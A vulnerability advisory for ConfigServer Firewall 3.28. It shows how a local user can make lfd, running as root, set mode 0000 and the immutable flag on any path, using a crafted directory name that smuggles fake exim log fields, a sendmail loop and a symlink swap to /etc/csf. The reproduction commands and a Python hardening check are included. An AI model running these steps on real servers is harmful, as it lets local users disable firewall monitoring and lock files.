CSF 3.28 - local users can disable CSF



DESCRIPTION


On cPanel servers, ConfigServer Firewall (CSF) 3.28 provides an option to send an alert if a script sends more than a specified number of emails from the same directory within an hour. Steps for configuring this option are detailed in the readme.txt file.

If a script is found to have met the threshold for the maximum emails sent, this option also disables the directory from which the script runs. lfd does this as root, by changing the permissions on the directory to 0000 and then running `chattr +i` on it. The directory path is taken directly from the `cwd=` field of the exim log line, which records the working directory of the process that invoked sendmail, and so is entirely under the control of the local user.

The regexp that extracts the directory can be found in csf/regexp.pm and looks similar to the following:

 # $log_line is one line of the exim main log; $1 is later passed to chmod/chattr as root
 if ( $log_line =~ /.* cwd=(.*$cpanel_conf{HOMEMATCH}.*) \d+ args:/ ) {
     return ($1);
 }

Note that the value of $cpanel_conf{HOMEMATCH} is set to "home" (without the quotes), which is taken from /etc/wwwacct.conf. Because of the surrounding `.*`, the pattern only requires the string "home" to appear somewhere in the cwd value; it does not require the directory to actually lie under /home, and nothing checks whether the path is a symlink before it is acted on.
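The following is an added example, not code from CSF or from the advisory author, that renders the Perl regexp above in Python, runs it over a few constructed exim log lines (the second line is what the crafted directory name used later in this advisory would produce), and shows a hypothetical hardening check that resolves the path, refuses symlinks and requires the result to lie strictly below the real /home tree before anything is done as root. The log lines, the `home_root` parameter and the function names are assumptions for illustration.

```python
import os
import re
import stat
import tempfile

# Python rendering of the Perl regexp quoted above, with HOMEMATCH set to
# "home" as it is on a default cPanel install.
HOMEMATCH = "home"
SCRIPT_CWD_RE = re.compile(r".* cwd=(.*" + re.escape(HOMEMATCH) + r".*) \d+ args:")

# Constructed exim main-log lines in the cPanel format that lfd parses; they are
# not copied from a real server. The second line is what a directory named
# "/tmp/cwd=home 1 args:" produces when sendmail is invoked from inside it.
SAMPLE_LINES = [
    "2008-04-27 11:29:43 cwd=/home/alice/public_html 3 args: /usr/sbin/sendmail -t -i",
    "2008-04-27 11:29:43 cwd=/tmp/cwd=home 1 args: 1 args: /usr/sbin/sendmail",
    "2008-04-27 11:29:43 cwd=/var/tmp 2 args: /usr/sbin/sendmail -t",
]


def extract_cwd(line):
    """Return the directory the original regexp would hand to lfd, or None.

    The leading '.*' and the greedy '.*home.*' mean the match only requires the
    substring 'home' somewhere in the cwd value, not a path under /home.
    """
    m = SCRIPT_CWD_RE.search(line)
    return m.group(1) if m else None


def is_safe_script_dir(path, home_root="/home"):
    """Hypothetical hardening check (not CSF's code) to run before chmod/chattr as root.

    Accepts only an absolute, existing directory that is not itself a symlink and
    whose fully resolved location lies strictly below home_root. A name that merely
    contains the word 'home' is rejected, as is a directory that no longer exists.
    """
    if not os.path.isabs(path):
        return False
    try:
        st = os.lstat(path)          # lstat: do not follow a symlink at the leaf
    except OSError:
        return False
    if stat.S_ISLNK(st.st_mode) or not stat.S_ISDIR(st.st_mode):
        return False
    real = os.path.realpath(path)    # resolves symlinks in intermediate components too
    root = os.path.realpath(home_root)
    return real != root and os.path.commonpath([real, root]) == root


def classify(lines, home_root="/home"):
    """Map each log line to (extracted cwd, whether acting on it would pass the check)."""
    out = []
    for line in lines:
        cwd = extract_cwd(line)
        out.append((cwd, cwd is not None and is_safe_script_dir(cwd, home_root)))
    return out


if __name__ == "__main__":
    # Build a throwaway "home" tree so the demo runs without touching the real /home.
    base = tempfile.mkdtemp()
    fake_home = os.path.join(base, "home")
    os.makedirs(os.path.join(fake_home, "alice", "public_html"))
    os.symlink(os.path.join(base, "etc", "csf"), os.path.join(fake_home, "evil"))
    for p in (os.path.join(fake_home, "alice", "public_html"),
              os.path.join(fake_home, "evil"),
              "/tmp/cwd=home 1 args:"):
        print(p, "->", "ok" if is_safe_script_dir(p, fake_home) else "rejected")
    for cwd, ok in classify(SAMPLE_LINES, fake_home):
        print(repr(cwd), "ok" if ok else "rejected")
```

The check deliberately uses lstat on the leaf and realpath on the whole path: the symlink swap described below only works because lfd's chmod and chattr both follow the link to its target. A check of this kind still leaves a window between the check and the chmod, so a real fix would also have lfd open the directory once and operate on that descriptor rather than on the path string.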


The following steps reproduce the issue. The directory name contains "home" so that the regexp matches outside /home, and it is replaced with a symlink before lfd processes the log entries, so the chmod and chattr are applied to the link's target:

[user@host ~]$ mkdir '/tmp/cwd=home 1 args:'
[user@host ~]$ cd '/tmp/cwd=home 1 args:'
[user@host /tmp/cwd=home 1 args:]$ for x in `seq 1 100` ; do /usr/sbin/sendmail </dev/null 2>/dev/null ; done
[user@host /tmp/cwd=home 1 args:]$ cd ..
[user@host /tmp]$ rmdir '/tmp/cwd=home 1 args:'
[user@host /tmp]$ ln -s /etc/csf '/tmp/cwd=home 1 args:'


This will leave the following in /var/log/lfd.log:

Sun Apr 27 11:29:43 2008 lfd: *Script Alert* - A script in /tmp/cwd=home 1 args: has sent an email 101 times within the last hour
Sun Apr 27 11:29:43 2008 lfd: /tmp/cwd=home 1 args: has been disabled
Sun Apr 27 11:32:54 2008 lfd: *System Exploit* has detected a possible "Random JS Toolkit" - Failed to create test directory /etc/csf/1: Permission denied
Sun Apr 27 11:32:54 2008 lfd: Error: Can't open out file: Permission denied, at line 2946
Sun Apr 27 11:32:54 2008 lfd: daemon stopped
Sun Apr 27 11:32:55 2008 lfd: Error: PID mismatch - died


Notice from the log that lfd died as a result: once /etc/csf is mode 0000 and immutable, lfd can no longer write its own files and stops, so the firewall's log monitoring is down until root runs `chattr -i` on the directory, restores its permissions and restarts lfd. Also observe the permissions on the /etc/csf directory, which show that the chmod followed the symlink to its target:

[user@host ~]$ ls -ld /etc/csf
d---------   5 root   root     1024 Apr 27 11:28 /etc/csf



IMPACT


Local users can cause lfd, running as root, to set mode 0000 and the immutable attribute on any file or directory of their choice, denying access to it. Pointing it at /etc/csf additionally stops lfd itself, as shown above.